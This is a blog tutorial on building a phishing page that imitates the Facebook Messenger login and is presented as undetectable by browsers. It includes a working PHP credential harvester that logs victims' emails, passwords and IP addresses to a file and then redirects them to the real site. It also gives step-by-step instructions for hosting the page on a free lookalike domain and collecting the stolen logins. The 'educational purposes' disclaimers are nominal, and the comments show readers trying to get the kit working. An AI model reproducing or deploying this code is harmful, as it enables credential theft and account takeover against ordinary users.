Header Ads

Seo Services

How to Create Undetectable Messenger Phishing Page (Advanced)


Note: Hacking without permission of others is quite illegal. Following tutorial is only for educational purpose and is written to acknowledge you. So that you will be able to avoid your self from such hacks. We are not responsible for any illegal activity from your side. 


In this tutorial I will show you that how to create undetectable phishing page?
Undetectable? Yes, undetectable. It means the browsers and the antiviruses can't detect it.
Ordinary phishing page can be detected in these days by modern browsers like Chrome, Mozila etc.
But the page, we will create in this tutorial, will be totally undetectable for these browsers.
Before we start, there are some fellows who don't even know that what the hell phishing is?
So let's introduce themselves with phishing.

What is Phishing?
Phishing is process in which a clone page or email is created of original one. This fake clone page looks like the original one, uses the same forms of the original page like signup, sign in forms, uses same scripts of original page like javascripts, css, php, but instead of redirecting to original site, it redirects to another page or place to do something illegal or legal depends upon the person.

Now you got the idea. let's create a phishing page.

For this purpose, I am going to use Facebook as target site.

Now follow the steps.

Note:
Download Messenger Phishing Files.





Step 1: Open login.php in notepad, replace "mobeen" with your name and save it.

<?php
$habbo = $_POST['email']; 
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("mobeen.html", "a"); 
fwrite ($f, 'Victims Name: [<b><font color="#570000">'.$habbo.'</font></b>] Victims Password: [<b><font color="#57003A">'.$password.'</font></b>] IP: [<b><font color="#005700">'.$ip.'</font></b>] By: [<b><font color="#005700"><a href="http://www.fb.com/mobeendotcom" rel="nofollow">M Hacker</a></font></b>]<br>');
fclose($f);
header("Location:https://www.messenger.com/login");
?>

Note: We will never get any info of your victim from this script. My Name (M Hacker) and fb profile (www.fb.com/mobeendotcom) is only a credit. 


Step 2: Goto www.freehostingeu.com and sign up for a free account.



Step 3: Enter into control panel. Goto "Domain Manager".



Click on "Create a Free .eu.pn/.me.pn Domain".
Enter the name of your site without .com, .net etc. and hit the "Create" button.




Step 4: Goto Dashboard >> File Manager, double click on the folder of your site.
Delete the index.html which is already present in that folder.
Now upload your files (e.g. index.html, login.php, fb.css......) in that folder.







Step 5: Type the url of your free site in address bar and enjoy your fake page.
For Example: http://massenger.eu.pn/



To see the username and password. Write the following text in your address bar.

www.yoursitename.me.pn/<your name, you typed in the php code in step 4>.html

For Example: http://massenger.eu.pn/mobeen.html

Note: Only for educational purposes. Don't use for any illegal activity.

Article By : Mobeen Tariq Warriach

7 comments:

  1. Commenting...To Make your Web Famous

    ReplyDelete
  2. hello admin
    i finish setting up every thing correct but when i tested the page i only got email address and the ip address while the password field is empty...please i need working script here is my email address sexyparagon@yahoo.com

    ReplyDelete
    Replies
    1. Hello jason! Thanks for commenting here on my post.
      Contact with me on Facebook.
      https://www.facebook.com/mobeentariq1337

      Delete
  3. Hi Ive had problems trying get to run and rotate and I can't find any way around it could you please help me ?

    ReplyDelete
    Replies
    1. Hey!message me on facebook i will help you there.Ok!
      Here is my facebook profile link:
      https://www.facebook.com/mobeentariq1337
      Thanks!
      Regards Admin!

      Delete
  4. hey brother i am unable to download phishing file from the link you provided. Do something please

    ReplyDelete

Powered by Blogger.